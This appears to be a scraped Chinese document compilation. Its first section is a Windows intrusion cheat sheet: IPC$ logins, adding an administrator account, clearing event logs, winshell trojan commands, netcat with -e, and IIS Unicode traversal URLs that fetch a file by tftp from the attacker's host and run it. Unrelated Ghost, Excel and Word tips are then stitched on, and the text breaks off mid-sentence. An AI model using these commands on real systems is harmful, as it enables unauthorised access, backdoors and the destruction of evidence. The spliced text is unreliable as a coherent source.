常见的系统命令行.doc

常见的系统命令行第二电脑网导读：主机） net use /IP地址/ipc$ 密码 /use:Administrator （传送文件到远程主机WINNT目录下）copy 本机目录路径/程序 /IP地址/admin$ （查看远程主机时间） net time /IP地址 （定时启动某个程序） at /IP地址 02:18 readme.exe 常用的几条NET命令： （与远程主机建立空管连接） net use /IP地址/ipc$ /use: （以管理员身份登录远程主机） net use /IP地址/ipc$ 密码 /use:Administrator （传送文件到远程主机WINNT目录下）copy 本机目录路径/程序 /IP地址/admin$ （查看远程主机时间） net time /IP地址 （定时启动某个程序） at /IP地址 02:18 readme.exe （查看共享） net view /IP地址 （查看netbios工作组列表） nbtstat -A IP地址 （将远程主机C盘映射为自己的F盘） net use f: /IP地址/c$ /user:Administrator （这两条把自己增加到管理员组）： net user 用户名 密码 /add net localgroup Administrators 用户名 /add （断开连接） net use /IP地址/ipc$ /delete 扫尾： del C:/winnt/system32/logfiles/*.* del C:/winnt/ssytem32/config/*.evt del C:/winnt/system32/dtclog/*.* del C:/winnt/system32/*.log del C:/winnt/system32/*.txt del C:/winnt/*.txt del C:/winnt/*.log 一、netsvc.exe 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务： netsvc /list /IP地址 netsvc schedule /IP地址 /query netsvc /IP地址 schedule /start 二、OpenTelnet.exe 远程启动主机的Telnet服务，并绑定端口到7878，例如： OpenTelnet /IP地址 用户名 密码 1 7878 然后就可以telnet到主机的7878端口，进入DOS方式下： telnet IP地址 7878 三、winshell.exe 一个非常小的木马（不到6K），telnet到主机的7878端口，输入密码winshell，当看到CMD后，可打下面的命令： p Path （查看winshell主程序的路径信息） b reBoot （重新启动机器） d shutDown （关闭机器） s Shell （执行后你就会看到可爱的“C:/”） x eXit （退出本次登录会话，此命令并不终止winshell的运行） CMD http:/./srv.exe （通过http下载其他网站上的文件到运行winshell的机器上） 四、3389登陆器，GUI方式登录远程主机的 五、elsave.exe 事件日志清除工具 elsave -s /IP地址 -l application -C elsave -s /IP地址 -l system -C elsave -s /IP地址 -l security -C 执行后成功清除应用程序日志，系统日志，安全日志 六、hbulot.exe 开启win2kserver和winxp的3389服务 hbulot /r 使用/r表示安装完成后自动重起目标使设置生效。 七、nc.exe(netcat.exe) 一个很好的工具，一些脚本程序都要用到它，也可做溢出后的连接用。 想要连接到某处: nc -options hostname ports ports . 绑定端口等待连接: nc -l -p port -options hostname port 参数: -e prog 程序重定向，一旦连接，就执行 危险! -g gateway source-routing hop points, up to 8 -G num source-routing pointer: 4, 8, 12, . -h 帮助信息 -i secs 延时的间隔 -l 监听模式，用于入站连接 -n 指定数字的IP地址，不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 任意指定本地及远程端口 -s addr 本地源地址 -u UDP模式 -v 详细输出用两个-v可得到更详细的内容 -w secs timeout的时间 -z 将输入输出关掉用于扫描时 八、TFTPD32.EXE 把自己的电脑临时变为一台FTP服务器，让肉鸡来下载文件，tftp命令要在肉鸡上执行，通常要利用Unicode漏洞或telnet到肉鸡，例如： http:/IP地址/s cripts/.%255c.%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:/winnt/system32/文件名然后可以直接令文件运行： http:/IP地址/s cripts/.%255c.%255c/winnt/system32/cmd.exe?/c+文件名 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的，选择“溢出后在一个端口监听”，然后用telnet连接它的监听端口，如果溢出成功，一连它的端口，绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出，成功以后winxp下需要打winxp。 一、ntis.exe、cmd.exe和cmdASP/ target=_blank class=infotextkeyasp.asp是三个cgi-backdoor，exe要放到cgi-bin目录下，asp放到有ASP执行权限的目录。然后用IE浏览器连接。 一、一 Xscan命令行运行参数说明： 在检测过程中，按空格键可以查看各线程状态及扫描进度，按q键保存当前数据后提前退出程序，按强行关闭程序。 1.命令格式: xscan -host - 其他选项 xscan -file 其他选项 其中 含义如下: -port : 检测常用服务的端口状态(可通过/dat/config.ini文件的PORT-SCAN-OPTIONS/PORT-LIST项定制待检测端口列表)； -ftp : 检测FTP弱口令(可通过/dat/config.ini文件设置用户名/密码字典文件)； -ntpass : 检测NT-Server弱口令(可通过/dat/config.ini文件设置用户名/密码字典文件)； -cgi : 检测CGI漏洞(可通过/dat/config.ini文件的CGI-ENCODE/encode_type项设置编码方案)； -iis : 检测IIS漏洞(可通过/dat/config.ini文件的CGI-ENCODE/encode_type项设置编码方案)； 其他选项 含义如下: -v: 显示详细扫描进度 -p: 跳过Ping不通的主机 -o: 跳过没有检测到开放端口的主机 -t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10硬盘克隆大师从入门到精通第二电脑网导读：。下面我就在此谈一谈Ghost使用的一些小技巧，供各位参考。一、入门技巧1.克隆前，先整理C盘用Norton 2002中的Norton System Check检查修复克隆前的系统的错误，并将欲克隆的分区或硬盘进行优化，以减少克隆过程中出现的各种麻烦，并能加速克隆的速度。 Windows自身的不稳定性、各种软硬件的故障以及一些莫名其妙的问题，常使们不得不重装系统，尤其对我们这些学校机房管理者来说更是一种灾难性的打击。其实我们只须合理使用Ghost，便会让这些烦恼一扫而空。下面我就在此谈一谈Ghost使用的一些小技巧，供各位参考。一、入门技巧1.克隆前，先整理C盘用Norton 2002中的Norton System Check检查修复克隆前的系统的错误，并将欲克隆的分区或硬盘进行优化，以减少克隆过程中出现的各种麻烦，并能加速克隆的速度。2.给映像文件减肥的技巧（1）把Windows98的Temp文件夹里的临时文件统统删掉；（2）把My Document（我的文档）和Temporary Internet Files（浏览器 缓存文件夹）两个文件夹搬到其余分区上；（3）删除那些用处不大的帮助文件、自述文件、屏幕保护文件、背景图片以及各种音频文件；（4）尽量把各种应用软件安装在其余分区上；（5）如果是在DOS下克隆还可使用DOS下的DEL命令把Windows98的虚拟内存文件Win386.swp删除。3.备份的技巧（1）在克隆前先勾选“Options/span/Create CRC32”选项可及时发现克隆过程中的错误。（2）硬盘分区备份的一般操作方法是：从Ghost的主菜单中选择“Local/Partition/To Image”选项，打开欲备份的硬盘（如果挂有一个以上硬盘）和分区，再指定存放映像文件的名称和路径，OK之后，即开始生成扩展名为.gho的映像文件。（3）在选择压缩率时，建议不要使用“high”，因为这样非常耗时，而压缩率也没有明显提高。（4）克隆完成后，使用“Local/Check/Image File”检查一下映像文件的完整性。4.映像文件的管理技巧（1）存放映像文件的分区或硬盘确保正确无误，并用有磁盘碎片程序整理好，然后再将映像文件存入；（2）将映像文件设为只读、隐藏、系统属性，这样既可妨止被意外删除又不会被磁盘碎片整理程序移动（笔者发现若对存放映像文件的分进行整理时，往往不能通过Ghost的32位CRC检测，因此我们应防此映像文件被磁盘碎片整理程序移动）；（3）如果条件允许的话最好将映像文件复制到外置硬盘或烧录到光盘上，以妨映像文件受损。5.恢复备份的技巧（1）恢复系统前一定要将一些重要的东西（如收藏夹、各种邮件信息等）进行备份（2）恢复备份的一般操作方法是：从Ghost的主菜单中选择“Local/Partition/From Image”选项，选中已有的映像文件，再指定要覆盖的分区，OK之后，即可将备份文件恢复到指定的分区。（3）要注意结合使用Ghost Explorer软件，这样当系统发生问题时，不必恢复整个分区或硬盘，只需将出现问题的文件夹或文件恢复即可。（4）最好用KV3000（Kill、Norton）工具将分区表信息备份到软盘上，这样可在遇到病毒破坏时能够轻松恢复。二、高级操作技巧1.Ghost常用命令参数介绍由于Ghost的命令参数较多，因此我们在这里只介绍几个常用的参数。（1）-RB：Ghost操作完成退出后自动重启；（2）-Zn：压缩映像文件，-Z或-Z1为不压缩（快速）；-Z2为高压缩（中速）；-Z3至-Z9压缩率依次增大（速度依次减慢）；（3）-FRO：跳过错误（用此参数可挽救硬盘坏道中的资料）（4）-CLONE：这是实现Ghost无人备份（恢复）的核心参数。使用语法是：-CLONE,MODE=(operation),SRC=(source),DST=(destination),SZE(size),SZE(size),说明：operation可取：copy：磁盘到磁盘；load：文件到磁盘；dump：磁盘到文件；pcopy：分区到分区；pload：文件到分区；pdump：分区到文件。source可取：驱动器号，从1开始；或者为文件名（此处需写绝对路径）。destination可取：驱动器号，从1开始；或者为文件名（此处需写绝对路径）；CDx ，刻录机，x表示刻录机的驱动器号，从1开始。（5）-PWD：设置密码，如果带上=*会自动输入，若不带，会在操作中提示输入，备分与恢复使用方法相同；（6）-F32：将磁盘格式由F16转换成F32；（7）-SURE：对所有要求确认的提示或警告统统回答“Yes”（此参数建议高级用户使用）；（8）-IA：强制复制（用于分区操作），推荐对C盘操作时使用此参数；（9）-SPAN：分类参数，当存放空间不足时提示复制到另一分区的另一个备份包。2.系统自动恢复盘的制作（1）启动Ghost制作映像文件，起名为：beifen.gho，存到D:/Beifen中。（2）制作Windows98启动盘，删掉一此不必要的文件，把Ghost.exe复制到启动盘上。（3）编写软盘上的autoexec.bat加入以下内容：Ghost CLONE,MODE=load,SRC=X:/Benfen/beifen.gho:1,DST=1 SURE RB（注：X为光盘盘符，由于用启动盘启动电脑后有一个虚拟盘，光盘盘符将向后顺延一位，因此如果您的光盘在系统中显示为F，这里的X就应设为G，以此类推）（4）刻录光盘：我使用的是Easy CD Creator，在添加完要刻录的数据后，选择制作“可引导CD”软件提示插入可引导软盘，将刚作好的启动盘插入软驱，单击“确定”，软盘上的内容便添加到要刻录的CD目录下，且多了两个特殊文件：bootcat.bin和bootimg.bin。这样便可刻录光盘了。经过这几步，我们的“系统自动恢复盘”便制作成功了，以后恢复系统的时候，只须在“CMOS”中把启动顺序设为“CD-ROM”，放入我们制作好的系统自动恢复光盘即可自动恢复系统，够爽吧！、Excel单元格使用技巧谈周围数据填充技巧如果您要填充的数据与周围单元格(或区域)中的数据相同，可用以下方法填充：按Ctrl+D将上方的数据填入当前单元格；按Ctrl+R将左侧的数据填入当前单元格；单击“编辑”、“填充”子菜单中的“向上填充”，可将下方的数据填入当前单元格；单击“编辑”、“填充”子菜单中的“向左填充”，可将右侧的数据填入当前单元格。如果要填充的是一个区域，可先将含有数据的区域选中，再按上述方法操作即可。数据记忆填充技巧如果同一列的各单元格需要填充文本或文本与数字混合的数据。可采用“记忆式键入”的方法进行填充：在已填充单元格的下一单元格继续输入，只要您输入的头几个字符(其中必须含有文本)与已输入的相同，Excel 2000就会自动完成剩余的部分。回车表示接受，否则可继续输入其他内容，修改excel 2000自动填充的部分内容。如果记忆式填充功能失效，只要将“选项”对话框“编辑”选项卡中的“记忆式键入”选中即可。选择填充技巧若需要填充前面已经输入过的文本(或文本与数字混合)。可以采用以下方法：选中需要填充数据的单元格，按ALT+键打开填充内容列表。或者用鼠标右键单击需要填充的单元格，OV98网址导航选择快捷菜单中的“选择列表”，即可打开填充内容列表。用上下方向键选中列表中需要的内容回车，或直接用鼠标单击需要的内容，它就被填入内容列表上方的单元格。快捷填充技巧此法可将选中内容以多种方式填充到行或列。操作方法是：在起始单元格中输入数据的初值，再在其下方或右侧的单元格中输入数据的其他值，然后将它们选中。将鼠标移至已选中区域右下角的填充柄，当光标变为小黑十字时，按下右键沿表格行或列拖动。选中需要填充的单元格区域后松开鼠标，在快捷菜单中选择合适的命令单击。重复填充技巧如果您要在多个单元格中使用同一公式或填充同一数据，请使用以下方法：选中需要使用公式或填充数据的所有单元格，如果某些单元格不相邻，可以按住Ctrl键逐个选中。单击excel编辑栏，按常规方法在其中输入公式或数据。输入完成后按住Ctrl键回车，公式或数据就会被填充到所有选中的单元格。 Excel中如何彻底隐藏部分工作表实际工作中，可能因需要建立多个excel工作表，当工作完成后，为了安全起见又需要将其中部分工作表隐藏起来，不让其显示。单击 “窗口”菜单-“隐藏”之后，系统会将所有的工作表隐藏起来，当“取消隐藏”后又会将所有的工作表全部显示出来。如果只需要隐藏指定的工作表，那么上面的方法就不能实现了。下面就是隐藏部分工作表的详细操作步骤： 第一步，选定需要隐藏的工作表。如果是多个相邻工作表：可以先选中第一张工作表的标签，再按住 Shift 单击最后一张工作表的标签。 如果是多个不相邻的工作表：可以单击第一张工作表的标签，再按住 Ctrl 单击其他工作表的标签。第二步，单击“格式”菜单 “工作表”“隐藏”命令。 如果是需要恢复隐藏的工作表，只需反其道而行，单击 “格式”“工作表”，再单击“取消隐藏”，在“取消隐藏工作表”列表框中，双击需要显示的被隐藏工作表的名称，即可取消隐藏工作表。 注意：取消隐藏命令，不能取消隐藏通过VBA编写的隐藏命令。以上就是隐藏工作表的操作步骤。使用隐藏工作表只是对文档的一种常规保护方法。它的一个致命弱点就是别人点击“格式”|“工作表”|“取消隐藏”，就会重现被隐藏的工作表。对VBA稍加熟悉一点，就可以利用VBA来进一步保护要隐藏的工作表。 当重要的Excel工作表编辑完毕，保存，单击菜单栏中的“工具”|“宏”|“Visual Basic 编辑器”，弹出“Microsoft Visual Basic 编辑器”窗口，在左侧窗格上部首先选中需要保护的工作表，然后在左侧窗格下部“属性”面板中找到“Visible”，将其值设置为“2-xlSheetVeryHidden”，进行如上设置后保存，在Excel窗口中，再也看不到隐藏的工作表了，这下别人就无法通过取消隐藏的方法来查看我们隐藏起来的工作表，相对就安全一些。如果还放心，还可以给隐藏的工作表设置一个口令，以策安全。还是打开“Microsoft Visual Basic 编辑器”窗口，在左侧窗格上部单击刚才被隐藏起来的工作表，然后单击菜单栏的“工具”|“VBAProject属性”，在弹出来的属性窗口中切换到“保护”选项卡，然后勾选“查看时锁定工程”，并在“密码”和“确认密码”文本框中输入自己欲使用的密码，单击“确定”。通过以上操作，不但将重要的excel工作表隐藏起来，而且还加上了口令保护，这下就安全了。当我们需要使用隐藏的工作表时，只需反其道而行之，进入“Microsoft Visual Basic 编辑器”窗口，双击左侧窗格上部的“VBAProject（工作薄名）”，在弹出来的口令验证对话框中正确输入前面设置的密码，然后将隐藏起来的工作表“Visible”属性值设置为“-1-xlSheetVisible”，退出“Microsoft Visual Basic 编辑器”窗口即可正常使用工作表。Word快速操作小技巧10则1.快速定位光标位置用WPS编辑文件时有一个特点，就是当你下次打开一WPS文件时，光标会自动定位到你上一次存盘时的位置。不过，Word却没有直接提供这个功能，但是，当我们在打开Word文件后，如果按下Shift+F5键您就会发现光标已经快速定位到你上一次编辑的位置了。小提示：其实Shift+F5的作用是定位到Word最后三次编辑的位置，即Word会记录下一篇文档最近三次编辑文字的位置，可以重复按下Shift+F5键，并在三次编辑位置之间循环，当然按一下Shift+F5就会定位到上一次编辑时的位置了。2.快速插入当前日期或时间有时写完一篇文章，觉得有必要在文章的末尾插入系统的当前日期或时间，一般人是通过选择菜单来实现的。其实我们可以按Alt+Shift+D键来插入系统日期，而按下Alt+Shift+T组合键则插入系统当前时间，很快！(OV98中文网址站)3.快速多次使用格式刷Word中提供了快速多次复制格式的方法：双击格式刷，你可以将选定格式复制到多个位置，再次单击格式刷或按下Esc键即可关闭格式刷。4.快速打印多页表格标题选中表格的主题行，选择“表格”菜单下的“标题行重复”复选框，当你预览 或打印文件时，你就会发现每一页的表格都有标题了，当然使用这个技巧的前提是表格必须是自动分页的。5.快速将文本提升为标题首先将光标定位至待提升为标题的文本，当按Alt+Shift+键，可把文本提升为标题，且样式为标题1，再连续按Alt+Shift+键，可将标题1降低为标题2、标题3标题9。6.快速改变文本字号Word的字号下拉菜单中，中文字号为八号到初号，英文字号为5磅到72磅，这对于一般的办公人员来说，当然已经绰绰有余了。但在一些特殊情况下，比如打印海报或机关宣传墙报时常常要用到更大的字体，操作起来就有些麻烦了。其实，我们完全也可以快速改变文本的字号：先在Word中选中相关汉字，然后用鼠标单击一下工具栏上的字号下拉列表框，直接键入数值，即可快速改变您的字体大小。而且这个技巧在Excel和WPS 2000/Office中同样适用。小提示：其实，小编还有两种快速更改Word文本字号的方法：(1)选中文字后，按下Ctrl+Shift+键，以10磅为一级快速增大所选定文字字号，而按下Ctrl+Shift+键，则以10磅为一级快速减少所选定文字字号；(2)选中文字后，按Ctrl+键逐磅增大所选文字，按Ctrl+键逐磅缩小所选文字。7.快速设置上下标注首先选中需要做上标文字，然后按下组合键Ctrl+Shift+=就可将文字设为上标，再按一次又恢复到原始状态；按Ctrl+=可以将文字设为下标，再按一次也恢复到原始状态。小提示：详见本刊前期Word XP中神奇的Ctrl键一文，掌握一些快捷按键对快速、高效操作Word很有借鉴意义。8.快速取消自动编号虽然Word中的自动编号功能较强大，但是据笔者试用，发现自动编号命令常常出现错乱现象。其实，我们可以通过下面的方法来快速取消自动编号。(1)当Word为其自动加上编号时，您只要按下Ctrl+Z键反悔操作，此时自动编号会消失，而且再次键入数字时，该功能就会被禁止了；(2)选择“工具”“自动更正选项”命令，在打开的“自动更正”对话框中，单击“键入时自动套用格式”选项卡，然后取消选择“自动编号列表”复选框(如图1)，最后单击“确定”按钮完成即可；9.快速选择字体为了达到快速选择字体的目的，我们可以将常用字体以按钮形式放置在工具栏上。首先右击Word工具栏，选择“自定义“命令，打开“自定义”对话框，在“自定义”对话框中选择“命令”选项卡，并移动光标条到类别栏中的“字体”项，看到平时经常使用的字体，把它拖到工具栏成为按钮，以后要快速选择字体，只要先选中文本，再按下工具栏上字体按钮即可，省去了从字体下拉列表框中众多字体中选择的麻烦。10.快速去除Word页眉下横线快速去除Word页眉下的那条横线可以用下面的四种方法：一是可以将横线颜色设置成“白色”；二是在进入页眉和页脚时，设置表格和边框为“无”；第三种方法是进入页眉编辑，然后选中段落标记并删除它；最后一种方法是将“样式”图标栏里面的“页眉”换成“正文”就行了怎样打印Excel2003中的指定单元一、区域设置法如果每次都是打印某一个固定的区域，用这种方法是最合适的。启动Excel2003（其它版本请仿照操作），打开相应的工作簿文件，选中需要打印的区域，执行“文件打印区域设置打印区域”命令。以后，需要打印该区域时，只要按一下“常用”工具栏上的“打印”按钮就行了。友情提醒此时，如果需要打印整个工作表的内容，请先取消